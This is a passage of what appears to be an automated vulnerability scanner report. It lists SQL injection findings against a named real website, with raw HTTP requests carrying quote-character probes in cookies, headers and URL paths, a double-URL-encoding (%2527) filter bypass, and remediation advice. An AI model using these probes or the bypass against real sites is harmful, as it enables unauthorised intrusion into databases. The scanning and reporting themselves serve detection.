HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:38:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:43:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:43:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:45:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:45:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.95. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:58:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:58:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:58:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:58:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html'?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:00:11 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html''?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:00:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:00:19 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:00:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:57:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:57:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:53:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:53:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:53:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:53:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22270
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=103ed91c731dbf91fdf70a26e6f77494; path=/ Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:40:04 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:40:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html'?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:36:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html''?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:36:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:36:32 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:36:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
